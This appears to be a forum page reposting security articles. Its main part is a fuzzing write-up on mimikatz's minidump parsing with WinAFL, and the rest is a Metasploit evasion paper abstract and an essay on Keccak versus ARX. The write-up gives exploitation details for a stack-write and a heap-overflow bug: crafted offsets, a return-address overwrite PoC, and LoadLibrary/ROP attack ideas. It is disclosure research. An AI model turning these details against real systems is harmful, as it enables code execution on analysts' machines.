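    apiHooks = {"kernel32.dll": [("MapViewOfFile", 5)]}

    def post_MapViewOfFile(self, event, retval):
        # retval is the base address of the freshly mapped minidump;
        # put a memory breakpoint (guard page) on the whole buffer.
        mapping_base.append(retval)
        event.debug.watch_buffer(event.get_pid(), retval, DUMP_SIZE,
                                 memory_breakpoint_callback)

def memory_breakpoint_callback(event):
    # Called for every access to the watched buffer: log the relative
    # offset. (The original script additionally disassembled the faulting
    # instruction with capstone to account for the exact read size.)
    offset = event.get_fault_address() - mapping_base[-1]
    hitcounts[offset] += 1

debug = Debug(MapViewOfFileHook(), bKillOnExit=True)
debug.execv(["mimikatz.exe", "lsass.dmp"])  # hypothetical command line
debug.loop()                                # returns when mimikatz exits

with open("offsets.log", "w") as f:
    for offset, count in sorted(hitcounts.items(), key=lambda x: -x[1]):
        f.write("0x%x %d\n" % (offset, count))
```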
The downside of the debugger memory-breakpoint approach is that it is extremely slow. On my test system, one run of mimikatz under this script takes approximately 30 minutes (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another downside is that it does not work for all applications, because applications typically copy input bytes to other buffers and access them there.

A more general approach is to write such a script with a dynamic instrumentation framework, which is also much faster (something I'm currently working on). Developing such a script is much harder, because we have to use shadow memory for taint tracking and follow copies of tainted memory (this taint propagation is a complex part because it requires a correct semantic understanding of the x86 instruction set) while storing which byte depends on which input byte; and all this should be as fast as possible (for fuzzing) and not consume too much memory (so that it's usable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similar solutions, most notably TaintScope (however, no source code or tool is publicly available, and it was just a PoC) and VUzzer (based on DataTracker/libdft, which themselves are based on PIN); some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either the source code and the tool are not publicly available, or they are very slow, or they don't work on Windows, or they don't propagate the file-offset information (they just mark data as tainted or not tainted), or they are written with PIN, which itself is slower than DynamoRio. I'm developing my own tool here to fulfill the above-mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with tmin, which also tries to reduce the input file size. However, it does this via a fuzzing approach, which is very slow (and can't handle checksums and file offsets so well).

We can also verify that the black bytes don't matter by simply removing them (zeroing them out) in the input file: the output of mimikatz for both files is exactly the same, therefore the black bytes really don't matter.
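A minimal sketch of this verification, together with the small-file/full-dump conversion helpers that the modified write_to_testcase() described below effectively performs (all names are illustrative; the offsets.log format matches the debugger sketch above):

```python
# zero_cold(): verification that only the "hot" (read) bytes matter.
# extract()/expand(): convert between the full dump and the small
# hot-bytes-only file that the fuzzer mutates.

def read_hot_offsets(path="offsets.log"):
    with open(path) as f:
        return sorted(int(line.split()[0], 0) for line in f)

def zero_cold(dump, hot):
    out = bytearray(len(dump))              # everything 0x00
    for off in hot:
        out[off] = dump[off]                # keep only the read bytes
    return bytes(out)

def extract(dump, hot):
    # full 27 MB dump -> small file (e.g. 91 KB / 3 KB) for the fuzzer
    return bytes(dump[off] for off in hot)

def expand(dump, hot, small):
    # small fuzzed file -> full dump that gets passed to mimikatz
    out = bytearray(dump)
    for i, off in enumerate(hot):
        out[off] = small[i]
    return bytes(out)

hot = read_hot_offsets()
dump = open("lsass.dmp", "rb").read()
open("lsass_zeroed.dmp", "wb").write(zero_cold(dump, hot))
```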
Now we can start fuzzing with a much smaller input file - only 91 KB instead of 27 MB!

PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN

I first started a simple fuzzer (not WinAFL), because I first had to modify the WinAFL code to fuzz only the identified bytes. I recommend starting fuzzing as soon as possible with a simple fuzzer and working on a better version of the fuzzer while it is running. My first fuzzer was a 50 LoC Python script which flipped bytes, invoked mimikatz over WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12-core home system (4 cores for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in the code (the 28 crashes are just variations of the same 4 bugs). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours; the second exploitable bug was not found at all with this approach.

I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the "post_handler", which can be used for test-case post-processing (e.g. fixing checksums; however, it's better to remove the checksum verification code from the target application). Since this handler is not called for dry runs (the first executions by AFL), this does not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer. In the input directory I stored a file containing only the heatmap bytes, so the file size is much smaller, like 91 KB or 3 KB. Next I added code to write_to_testcase() which copies all bytes from the input file over the heap buffer at the correct positions. Therefore, AFL only sees the small files but passes the correct memory dumps to mimikatz. This approach has a little drawback though: as soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was enough. Later I'm going to invoke the heatmap calculation for every queue entry if a heuristic detects this to be more efficient.

Please also bear in mind that AFL and WinAFL write every testcase to disk. This means we have to write a 27 MB file per execution (also per in-memory execution, like a simple bit flip!). From a performance perspective it would be much better to modify the testcase inside the target application, in memory (we already do in-memory fuzzing, so this is possible). Then we can also skip all the process switches from WinAFL to the target application and back, and then we really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even Python code) into the target application, an area on which I'm also currently working.

Here is a screenshot of my WinAFL output (running on a RAMDisk). Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes:

First the good: we already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique coverage; see the green area). Now the bad: the fuzzing speed is only 13 exec/sec (blue), which is extremely slow for AFL (but much faster than the self-written fuzzer, which had 2 exec/sec per core). And now the really bad: we have been running for 14.5 hours and haven't yet finished the bitflip 1/1 stage for the first input file (and 136 others are in the queue). You can see this in the red area: we have just finished 97% of this stage. And after that, 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing will not be very efficient.

For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job. The new WinAppDbg script reduced the number of "hot bytes" to 3 KB (first we had 27 MB, then 91 KB, and now we have just 3 KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but does log access attempts to copied memory regions. This WinAppDbg script was approximately 800 LoC (because I have to follow copies which go to heap and stack variables, and I have to disable logging when the variables are freed).

Here is a screenshot of the above job (with the "big" 91 KB input files) after 2 days and 7 hours: we can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (98% finished). You can also see that the bitflip 1/1 strategy required 737k executions and that 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1, where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours. And now the fuzzing of the smaller 3 KB files, after 2 hours: we already have 30 unique crashes! (Compare this with only 22 crashes after 2 days and 7 hours with the 91 KB file!)
We can also see that, for example, the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we found 245 unique paths with just 103k total executions (compared to 184 unique paths after 2.17 million executions with the 91 KB test input). And now consider how long it would have taken to fuzz the full 27 MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size.

Here is one more demonstration of the different input file sizes. The following animated image (created via Veles, https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file. And now the 27 MB minidump file where all unimportant (not read) bytes are replaced with 0x00, so we only see the 3 KB of bytes which we fuzz with WinAFL; you may have to zoom in to see them. Look at the intersection of the 3 coordinate axes.

However, in my opinion even the 3 KB fuzzing job is too slow/inefficient. If we can start the job on multiple cores and let it run for one or two weeks, we should get into deeper levels and the result should be OK. But why are we even so slow? Why do we only have an execution speed of 13 or 16 exec/sec? Later queue entries will result in faster execution speeds, because mimikatz will not execute the full code for inputs that trigger error conditions (which results in execution speeds like 60 exec/sec). But on Linux we often deal with execution speeds of several thousand executions per second. A major point is that we have to load and search a 27 MB file with every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups:

- Execution speed with WinAFL in syzygy mode: ~13 exec/sec
- Native execution speed without WinAFL and without instrumentation (in-memory): ~335 exec/sec
- Execution without WinAFL but with an instrumented (syzygy) binary: ~50 exec/sec
- Execution of the native binary (instrumentation via DynamoRio drcov): ~163 exec/sec

So we can see that syzygy instrumentation results in a slowdown factor of approximately 6, and syzygy plus WinAFL in a factor of approximately 25. This is mainly because of the process switches and file writes/reads, since we are not doing full in-memory fuzzing; but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs. 50 exec/sec), and we can also start WinAFL in DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0.05-2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly, because DynamoRio mode should be much faster!

The reason can be found in our modification of the kuhl_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start, because this is exactly what the "sekurlsa::minidump" command does. What I wanted to achieve was to immediately execute the "sekurlsa::minidump" command and after that the "sekurlsa::logonpasswords" command, and that's why I used this sequence of calls. However, this is a huge problem, because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) in a state where the input file is still open!
This is because we call the kuhl_m_sekurlsa_reset() function at the start of the loop body and not at the end! That means that we only execute one "execution" in-memory; then WinAFL tries to modify the input file, detects that the file is still open and can't be written to, and terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode, or via nudges in DynamoRio mode from afl-fuzz.c:2195) in order to write the file. Therefore, we are not doing real in-memory fuzzing, because we execute the application once and then the application must be closed and restarted to write the next test case. That's why the DynamoRio mode is so slow: the application must be started again for every testcase, which means the application must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instruments statically, it's not affected as heavily by this flaw (it still has to restart the application, but does not have to instrument it again).

Let's fix the problem by moving kuhl_m_sekurlsa_reset() to the end of the loop:

```c
NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[])
{
    while (__afl_persistent_loop())
    {
        pMinidumpName = argv[1];
        kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages));
        kuhl_m_sekurlsa_reset();
    }
    return STATUS_SUCCESS;
}
```

If we execute this, we still face the same problem. The reason is a bug inside mimikatz, in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls:
1. CreateFile
2. CreateFileMapping
3. MapViewOfFile

Therefore, we have to close all three of these handles/mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset():

```c
case KULL_M_MEMORY_TYPE_PROCESS_DMP:
    toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump;
    break;
...
}
cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem);
CloseHandle(toClose);
```

kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address (from kull_m_minidump_open()):

```c
*hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE));
```

That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which never gets stored). After fixing this issue it starts to work, and WinAFL gets 30-50 exec/sec! However, these executions are very inconsistent, sometimes dropping to under 1 execution per second (when the application must be restarted, like after crashes). Because of this, we got better overall fuzzing performance with the syzygy mode (which now has a speed of ~25 exec/sec) and which also uses edge coverage.

Comparing a screenshot of WinAFL in DynamoRio mode (bear in mind that with DynamoRio the default is basic-block coverage, not edge coverage) with one of WinAFL in syzygy mode: even though DynamoRio mode shows a higher execution speed (29.91 exec/sec vs. 24.02 exec/sec), it's slower in total, because the execution speed is inconsistent. We can see this because the DynamoRio mode had been running for 25 minutes and only reached 13.9k total executions, while the syzygy mode had been running for just 13 minutes but already reached 16.6k executions. We can see that it's currently more efficient to fuzz in syzygy mode if source code is available (especially if the target application crashes very often).
And, also very important: we had a bug in the code which slowed down the fuzzing process (at least by a factor of 2) and we didn't see it during syzygy fuzzing! (A status-screen entry showing in-memory executions vs. application restarts would be a great feature!) Please also note that the WinAFL documentation explicitly mentions this in the "How to select a target function" chapter:
- Close the input file. This is important because if the input file is not closed, WinAFL won't be able to rewrite it.
- Return normally (so that WinAFL can "catch" this return and redirect execution; "returning" via ExitProcess() and such won't work).

The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and don't get the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16600 executions), and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode because of the dynamic instrumentation, and then it's better to use the syzygy mode. Please also note that we can "fix" this by storing the stack pointer in the pre-fuzzing handler of DynamoRio and implementing a crash handler where we restore the stack and instruction pointer, free the file mappings and handles, and just continue fuzzing as if nothing had happened. Memory leaks can also be handled, by hooking and replacing the heap implementation so as to free all allocations from the fuzzing loop. Only global variables could become a problem, but this discussion goes too far here.

At the end I started a fuzzing job in syzygy mode with one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing) and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant; however, two crashes are critical.

PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES

Vulnerability 1: Arbitrary partial relative stack overwrites

In this chapter I want to describe only the two critical crashes in depth. After fuzzing I had several unique crashes (based on the call stack of the crash), which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one I thought was most likely to be exploitable) and analysed it. Here are the exact steps.

This is the code with the vulnerability: the variable "myDir" is completely under our control. myDir points into our memory dump; we can therefore control all the content of this struct. You may want to find the problem yourself before continuing, so here are some hints:
- The argument length is always 0x40 (64), which is exactly the length of the destination argument buffer
- The argument source is also under our full control
- Obviously we want to reach RtlCopyMemory() in line 29 with some malicious arguments

Now try to think about how we can exploit this. My thoughts, step by step: I want to reach line 29 (RtlCopyMemory()), and therefore the IF statement from lines 9-13 must be true. We can exploit the situation if "lengthToRead" (the size argument of the RtlCopyMemory call) is bigger than 0x40, or if offsetToWrite is bigger than 0x40. The second case would be better for us, because such relative writes are extremely powerful (e.g. just partially overwriting return addresses to bypass ASLR, or skipping stack cookies, and so on).
So I decided to try exactly this: somehow control "offsetToWrite", which is only set in lines 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to reach line 18, the IF statement from line 15 must become true. First condition: Source < memory64→StartOfMemoryRange. This is no problem because we control both values completely. So far, so simple. Now let's check the first IF statement (lines 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Let's focus on line 12, because from the IF at line 15 we know that Source < memory64→StartOfMemoryRange must be true, which is exactly what the first check here is for. So this one is true. That means we only have to ensure the second check. Second condition: Source + Length > (memory64→StartOfMemoryRange + memory64→DataSize). I'll leave this condition aside for a moment and think about lines 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible, relative to an address, to deal with ASLR), the source address (to point into my own buffer) and the size – that would really be great. The size is exactly lengthToRead, and this variable can be set via line 25 or 27. Line 25 would be a bad choice because Length is fixed and offsetToWrite is already "used" to control the target address. So we must come to line 27. OffsetToRead is always zero because of line 17, and therefore memory64→DataSize completely controls lengthToRead. Now we can fix the next value and say that we want memory64→DataSize to always be 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready: take the second condition and fill in the known values. What we get is: Second condition: Source + 0x40 > (memory64→StartOfMemoryRange + 1). This check (together with the first condition) is exactly the check which should ensure that DataSize (the number of bytes which we write) stays within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64→StartOfMemoryRange to 0xffffffffffffffff, and we survive the check because after adding one to it we get zero, which means Source + 0x40 is always bigger than zero (as long as we don't overflow Source + 0x40). At the same time we survive the first condition because Source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18: offsetToWrite = 0xffffffffffffffff – Source. You might think that we can't fully control offsetToWrite because on x86 mimikatz the Source variable is just 32-bit (and the 0xffff… value is 64-bit); however, because of integer truncation the upper 32 bits are removed, and therefore we really can address any byte in the address space relative to the destination buffer (on x64 mimikatz it's 64-bit, so it's no problem either). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), we have full control over the size of the write operation and full control over the values! The code can also be triggered multiple times (the loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is what offset to use. Since we write relative to a stack variable, we are going to target a return address.
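To see the integer wrap-around concretely, here is a small standalone C sketch; the variable names follow the article's description, not mimikatz's exact source:

    #include <stdio.h>
    #include <stdint.h>

    int main(void) {
        /* attacker-controlled fields parsed from the minidump */
        uint64_t StartOfMemoryRange = 0xffffffffffffffffULL;
        uint64_t DataSize           = 1;

        uint64_t Source = 0x1000;  /* requested address                */
        uint64_t Length = 0x40;    /* fixed destination buffer size    */

        /* first condition: trivially true, Source < StartOfMemoryRange;
           second condition: StartOfMemoryRange + DataSize wraps to 0,
           so Source + Length is always "bigger" and the check passes  */
        if (Source < StartOfMemoryRange &&
            Source + Length > StartOfMemoryRange + DataSize)
            printf("checks passed despite an out-of-bounds range\n");

        /* line 18: offsetToWrite becomes a huge relative offset,
           truncated to 32 bits on x86 mimikatz */
        printf("offsetToWrite = 0x%llx\n",
               (unsigned long long)(StartOfMemoryRange - Source));
        return 0;
    }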
The destination variable is passed as an argument inside the kull_m_process_ntheaders() function, and this is exactly where we place a breakpoint, on the first kull_m_memory_copy() call. Then we can extract the "destination" argument address and the address where the return address is stored, and subtract them. What we get is the required offset to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems will very likely require different offsets). Offset 0x6B4 stores the "source" variable. I use 0xffffff9c here because this is exactly the correct offset from "destination" to "return address" on the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; however, this offset should also work for older versions!). Offset 0xF0 stores the "myDir" struct content. The first 8 bytes store the NumberOfMemoryRanges (this controls the number of loop iterations and therefore how often we can write). Since we just want to demonstrate the vulnerability, we set it to one to make exactly one write operation (overwrite the return address). The next 8 bytes are the BaseRVA. This value controls "ptr" in line 6, which is the source from where we copy data. So we have to store there the relative offset in our dump file where we store the new return address (which should overwrite the original one). I'm using the value 0x90 here, but we can use any value. It's only important that we then store the new return address at that offset (in my case offset 0x90). I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the "StartOfMemoryRange" variable. I originally used 0xffffffffffffffff (like in the above example); however, for demonstration purposes I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize; check the second condition in line 12). The next 8 bytes control the "DataSize" and, as already explained, I set this to 4 to write 4 bytes. Here is the file: Hint: In the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20) we can see that this is the offset to the "streams" directory. Therefore, the above minidump has a streams directory starting at offset 0x20. Every entry there consists of 3 DWORDs (on x86); the first is the type and the last is the offset. We search for the entry with type 0x09 (= Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there we can see that it is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file you may want to patch it first. And here is the proof that we really have control over the return address: Please note that full exploitation is still tricky because we have to find a way around ASLR. Because of DEP our data is marked as not executable, therefore we can't jump into shellcode. The default bypass technique is to apply ROP, which means that we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. Here is what we can do with the above vulnerability: we can make a relative write on the stack, which means we can overwrite the return address (or arguments or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next, we can choose the size of the write operation, which means we can make a partial overwrite.
We can therefore overwrite only the two lower bytes of the return address, which means we can bypass module-level ASLR (these two properties together are what make the vulnerability so useful). We can check the ranges which we can reach by examining the call stack to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite), and we have multiple paths to the vulnerable code (and therefore different call stacks with different ranges; we can even create more call stacks by overwriting a return address with an address which creates another call stack to the vulnerable code). For example, a simple exploit could overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g. 0x455DF3, which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen in a way that the function argument is a pointer to the stack, because then we can use the vulnerability to write the target path (a UNC path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system which later gets loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments of the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) into the memory dump buffer. After that, these bytes can be written back to the stack (with the vulnerability) and full ROP chains can be built, because we can now write ROP gadget addresses one after another. Without this idea we cannot execute multiple ROP gadgets in sequence, because they are not stored adjacently on the stack (return addresses are not stored next to each other; other data lies between them, such as arguments, local variables and so on). However, I believe this exploitation scenario is much more difficult because it requires multiple writes (which must be ordered so as to survive all checks in the mimikatz code), so the first approach with LoadLibrary should be simpler to implement. Vulnerability 2: Heap overflow The root cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length (the number of bytes the string can hold) and the length (the number of currently stored characters). The content is completely under attacker control because it is parsed from the minidump. Moreover, the source (the second argument) also points into the minidump (attacker controlled). Mimikatz always extracts the string structure from the minidump and then calls kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes, and after that it copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length, and therefore string->Length can be bigger than string->MaximumLength because this value is retrieved from the minidump. If later code uses string->Length, a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump.
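A hypothetical reconstruction of the flawed pattern, for illustration only (field names follow the Windows UNICODE_STRING convention; this is not mimikatz's exact code):

    #include <windows.h>

    typedef struct {
        USHORT Length;         /* attacker-controlled, never validated */
        USHORT MaximumLength;  /* attacker-controlled allocation size  */
        PWSTR  Buffer;
    } ATTACKER_STRING;

    BOOL get_unicode_string_sketch(ATTACKER_STRING *string, LPBYTE dump, SIZE_T rva)
    {
        /* "line 9": allocates MaximumLength bytes ... */
        string->Buffer = (PWSTR) LocalAlloc(LPTR, string->MaximumLength);
        if (!string->Buffer)
            return FALSE;
        /* "line 11": ... and copies MaximumLength bytes -- consistent so far */
        RtlCopyMemory(string->Buffer, dump + rva, string->MaximumLength);
        /* the missing check: if (string->Length > string->MaximumLength) reject;
           any later code that trusts string->Length overflows the heap buffer */
        return TRUE;
    }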
Then mimikatz uses the string as input (and output) inside the decryption function in kuhl_m_sekurlsa_nt6_LsaEncryptMemory(), and the manipulated length value leads to a heap overflow (in my opinion the MSV1.0 execution path is not trivial, perhaps not possible, to exploit, but there are many other paths which use kull_m_process_getUnicodeString()). Vulnerabilities patch status At the time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author about the problems on 2017-08-26 and received a very friendly answer on 2017-08-28, saying that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and that it could be made more secure by using a higher-level language, which I totally agree with. On 2017-08-28 I sent the S/MIME-encrypted vulnerability details (together with this blog post). Since I didn't receive answers to further emails or Twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant and use mimikatz in minidump mode, make sure to only use it inside a dedicated mimikatz virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway). To further mitigate the risk (e.g. a VM escape) I recommend fixing the above-mentioned vulnerabilities. THEORY: RECOMMENDED FUZZING WORKFLOW In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend: Download as many input files as possible. Calculate a minset of input files which still trigger the full code/edge coverage (corpus distillation); use a Bloom filter for fast detection of differing coverage. Minimize the file size of all input files in the minset. For the generated minset, calculate the code coverage (no Bloom filter). Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input set and should not crash. However, we can continue downloading more files from the internet and start the modified binary with them (or just fuzz it). As soon as the application crashes (and our just-in-time configured debugger script kicks in) we know that a new code path was taken. Using this approach, we achieve native execution speed but still extract the information about new coverage! (Downsides: checksums inside files break; moreover, a fork server should also be used.) During fuzzing I recommend extracting edge coverage (which requires instrumentation), and therefore we should fuzz with instrumentation (and sanitizers / heap libraries). For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: first, identify the common code which gets executed for most inputs (for this we had to log the code coverage without the Bloom filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input "important" (code which only gets executed for this input). Next, we start our heatmap analysis, but we only log the read operations conducted by this "important" code. What we get from this are the bytes which make our input "important". Now we don't have to fuzz the full input file, nor all the bytes which are read by the application; instead we only have to fuzz the few bytes which make the file "special"!
I recommend focusing on these "special" bytes first, but also fuzzing the other bytes afterwards (fuzzing the special bytes fuzzes the new code; fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once per new input (e.g. log all heap allocations and check for dangling pointers after a free operation; a similar concept to Edge's MemGC). Of course, additional feedback mechanisms and symbolic execution can be added on top. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SeCX for fuzzing applications with source code available, and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
-
Metasploit Low Level View Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat Abstract: For the past (almost) decade, Metasploit has been the number-one pentesting tool, and a lot of plug-ins have been developed specifically for it. The key point of this paper is to discuss the Metasploit framework as a code injector and payload encoder. Another key point of this paper is the different forms malware can take and how to evade anti-virus software, which has lately been a pain for pentesters, and how exactly anti-malware software works. Download: https://www.exploit-db.com/docs/18532.pdf
-
Why Keccak is not ARX If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back on a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2. We specified Keccak at the bit level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode similarly including bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2^n, with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX, which stands for "addition, rotation and exclusive-or (XOR)". The ARX approach is widespread and adopted by the popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs. ARX is fast! It is! Is it? One of the main selling points of ARX is its efficiency in software: addition, rotation and XOR usually take only a single CPU cycle. For addition, this is not trivial because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives with dedicated hardware, not much can be gained, unlike in bit-oriented primitives such as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) and gate delay (latency): it is either compact or fast, but not both at the same time. A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: it simply takes a single XOR per bit and has the gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor of 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when protection against power or electromagnetic analysis is required. Effective protection at the primitive level requires masking, namely, where each sensitive variable is represented as the sum of two (or more) shares and where the operations are performed on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), and for addition the sum must be modulo 2^n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking. ARX is secure! It is! Is it? The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. MD5 took almost 15 years to be broken, while the collision attacks that were finally found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented which in retrospect look trivial but remained undiscovered for many years.
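Coming back to the masking trouble mentioned above, here is a toy C illustration of the two sharing styles an ARX design must keep converting between (a real masked implementation would never recombine the shares in one step as the last line does):

    #include <stdint.h>
    #include <stdio.h>

    int main(void) {
        uint32_t x = 0xdeadbeef;   /* sensitive value   */
        uint32_t r = 0x12345678;   /* random mask/share */

        uint32_t bool_share  = x ^ r;  /* Boolean masking: x = bool_share ^ r             */
        uint32_t arith_share = x - r;  /* arithmetic masking: x = arith_share + r mod 2^32 */

        /* XORs and rotations act cheaply on Boolean shares, additions on
           arithmetic shares; ARX needs both, hence the costly conversions */
        printf("%08x %08x\n", bool_share ^ r, arith_share + r);
        return 0;
    }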
Nowadays, when a new cryptographic primitive is published, one expects arguments on why it would provide resistance against differential and linear cryptanalysis. Evaluating this resistance implies investigating the propagation of difference patterns and linear masks through the round function. In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: it does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight. ARX is serious! It is! Is it? But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers for its design approach to NORX, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson, whose name stems from a rather explicit "NO(T A)RX". Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, 